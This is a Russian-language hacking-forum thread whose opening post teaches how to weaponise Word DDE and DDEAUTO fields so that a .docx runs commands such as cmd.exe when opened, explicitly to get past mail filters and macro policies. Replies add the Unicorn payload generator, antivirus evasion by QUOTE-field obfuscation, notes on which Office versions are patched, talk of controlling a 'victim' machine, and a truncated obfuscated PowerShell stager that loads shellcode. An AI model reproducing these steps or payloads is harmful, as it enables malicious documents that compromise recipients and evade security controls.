Статья DDE на замену макросам.

Предыстроия простая, посматривая просторы интернета, наткнулась на статью тут:

Ссылка скрыта от гостей

она декламирует что есть способ по создание метода который вытеснит макросы, и я загорелась желанием узнать способ создание. О своем опыте и будет эта статья.

DDE – это Microsoft Dynamic Data Exchange, позволяет выстаивать кастомное поле, в нем и создастся путь для подгружать данные из других приложений семейства Microsoft.

Протокол DDE представляет собой набор сообщений и рекомендаций. Он отправляет сообщения между приложениями, которые использует общую память для обмена данными. Приложения могут использовать протокол непрерывного обмена, когда приложения отправляют обновления друг другу по мере поступления новых данных.

Использование DDE в Excel или Word для вредоносных целей может быть весьма полезным, потому что макросы могут быть отфильтрованные почтовыми шлюзами и корпоративной политикикой VBA. Кроме того использование DDE в MSWord так же просто, как добавление поля и выполнение следующего:

1 шаг - Тык на: «Вставить», «Быстрые элементы», «Поле»:

2 шаг - Мы выбрали «= (Формула)» и Ok:

Альтернативный метода мы можем просто добавить поле, нажав CTRL + F9

3 шаг - После этого мы увидим поле, вставленное в документ, с ошибкой «Ошибка в формуле». Щелкните правой кнопкой мыши по полю и выберите «Включить или отключить коды полей»

4 шаг - Получаем это:

5 шаг - Мы должны изменить на следующее то что было на это:

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" }

Ключевое слово DDEAUTO указывает MSWord, что это поле DDE и будет запускаться автоматически при открытии документа, вторая часть - полный путь к исполняемому файлу, который запускается, а последняя часть в кавычках - это аргументы для передачи (выполнить calc .exe).

Теперь мы сохраняем документ как обычный «.docx» и открываем его на любом компьютере. Первое предостережение - обновить ссылки на документы, там ничего злонамеренного.

6 шаг - Открывается пару окон, мы тыкаем да, да, и у нас открывается консоль, и она уже открывает то что мы хотим, в нашем случае калькулятор.

Теперь разберем выхлоп: Первое предостережение - обновить ссылки на документы, там ничего злонамеренного.
Второе - приглашение - запрашивает у пользователя, следует ли запускать указанное приложение, это можно рассматривать как предупреждение о безопасности, поскольку оно предлагает пользователю запустить «cmd.exe», однако с соответствующей модификацией синтаксиса вы можете скрыть ...

То же самое можно достичь с помощью идентификатора поля «DDE»:

{DDE "c:\\windows\\system32\\cmd.exe" "/c notepad"}

Но в этом случае нам придется изменить .docx, чтобы включить автоматическое обновление ссылок. Для этого распакуйте файл .docx, отредактируйте word/settings.xml и вставьте следующий тег XML:

<w:updateFields w:val="true"/>

Затем мы сохраняем файл конфигурации и обновляем файл. Когда вы откроете его, Word предложит вам обновить ссылки с помощью немного другого приглашения, чем раньше, но с тем же результатом, что и DDEAUTO.
И самое лучшее, никаких макросов, никаких предупреждений о безопасности, что САМОЕ главное.

Спасибо за внимание и до новых встреч.
ps - надеюсь картинки нормально отобразятся
pss - а приветствие в конце, спасибо что остались до этих строк!

 

[erlan1749]

А как полезную нагрузку туда поместить, так и не понял? без эксплоита как в теме у IioS.

 

[IioS]

А как полезную нагрузку туда поместить, так и не понял? без эксплоита как в теме у IioS.

Вот человек уже писал:

Автоматизацию подвезли) В новый релиз Unicorn 2.9 https://github.com/trustedsec/unicorn добавили модуль DDE

С помощью unicorn создаешь ДДЕ, и помещаешь его в ворд\ексель

 

[akv8]

В декабре Microsoft обновлением отключила DDE в Word по дефолту.

 

[OneTrust]

Кто в каком офисе тестировал? В Word 2016 уже не работает данный способ.

 

[OneDollar]

Кто в каком офисе тестировал? В Word 2016 уже не работает данный способ.

Так пол года прошло)

 

[Ondrik8]

все работает! просто там немножко все поменялось и в лучшую сторону))

 

[OneTrust]

все работает! просто там немножко все поменялось и в лучшую сторону)

А если немножко детальней и предметней?

---- Добавлено позже ----

все работает! просто там немножко все поменялось и в лучшую сторону))

Не царское это дело для обычных холопов вещать. Я вас понял)

 

[kot-gor]

Всем добрый вечер , решил потестить данный метод..
Скажу сразу, он срабатывает идеально когда нет антивирусника и обновления, если еще детект АВ можно обойти с помощью обфускации.Насколько я понял детект АВ происходит по ключевым словам , а именно DDE и DDEAUTO.
Для обфускации использовался метод с полем QUOTE ( такая же обфускация используется в Единороге,но частично), я использовал PowerShell и скрипт который преобразует полезную нагрузку в виде целых чисел..
сам скрипт

Ссылка скрыта от гостей

.
С единорогом тоже пробовал, но детект выше.
Как вариант можно использовать фреймы и подгружать *.docx c DDE с внешних ссылок..(но пока руки не дошли до этого)
Что касается обновлений. На винде 10 и 7 с последними обновлениями DDE не сработал. на голой 7 DDE отработал на ура.Word использовался 2013.

 

[Mitistofel]

Но в этом случае нам придется изменить .docx, чтобы включить автоматическое обновление ссылок. Для этого распакуйте файл .docx, отредактируйте word/settings.xml и вставьте следующий тег XML

Подскажите не знающему, как делается этот пункт? )

 

[IioS]

Подскажите не знающему, как делается этот пункт? )

Сама не знающая, была) Погуглив узнала что можно так:
1 -- меняем формат "файл.docx” в “файл.docx.zip”
2 -- заходим в архив и ищем файл тут "word/settings.xml"
3 -- открываем в редакторе, добавляем строку "<w:updateFields w:val="true"/>"
4 -- убираем расширения, "zip"
5 -- Профит? (не проверяла работоспособность с DDE, но сам ворд должен работать)

 

[Mitistofel]

Сама не знающая, была) Погуглив узнала что можно так:
1 -- меняем формат "файл.docx” в “файл.docx.zip”
2 -- заходим в архив и ищем файл тут "word/settings.xml"
3 -- открываем в редакторе, добавляем строку "<w:updateFields w:val="true"/>"
4 -- убираем расширения, "zip"
5 -- Профит? (не проверяла работоспособность с DDE, но сам ворд должен работать)

Очень хорошо объясняешь, прямо можно сказать что за меня всё сделала )

 

[IioS]

Очень хорошо объясняешь, прямо можно сказать что за меня всё сделала )

Т.к. была новая информация и для меня, решила закрепить)

 

[Tuffy]

Сама не знающая, была) Погуглив узнала что можно так:
1 -- меняем формат "файл.docx” в “файл.docx.zip”
2 -- заходим в архив и ищем файл тут "word/settings.xml"
3 -- открываем в редакторе, добавляем строку "<w:updateFields w:val="true"/>"
4 -- убираем расширения, "zip"
5 -- Профит? (не проверяла работоспособность с DDE, но сам ворд должен работать)

где именнo нужно добавить строку? в самом начале кода или где?

 

[Elektrolife]

А разве получить доступ к powershell не равносильно получению управления компом Victim?)

К сожалению не всегда можно перехватить полный контроль ( Я тут воюю с машиной,прикрытой sophos endpoint protection. Даже имея права системы завалить его не получается,т.к он слушается только доменного админа,а контроль над DC я потерял. Пробовал срубить его через PS и через wmic - не работает

 

[wurdalak]

Ребята подскажите как с помощью unicorn вставить dde код в строку, он получается очень длинный.
Типа такого. Не полный но всё же.

powershell /w 1 /C "sv auN -;sv kR ec;sv sM ((gv auN).value.toString()+(gv kR).value.toString());powershell (gv sM).value.toString() ('JABtAGwAPQAnACQAcwBhAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQALgBkACIAKwAiAGwAIgArACIAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AIgArACIAZAAiACsAIgBsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHB6AA'+'==')"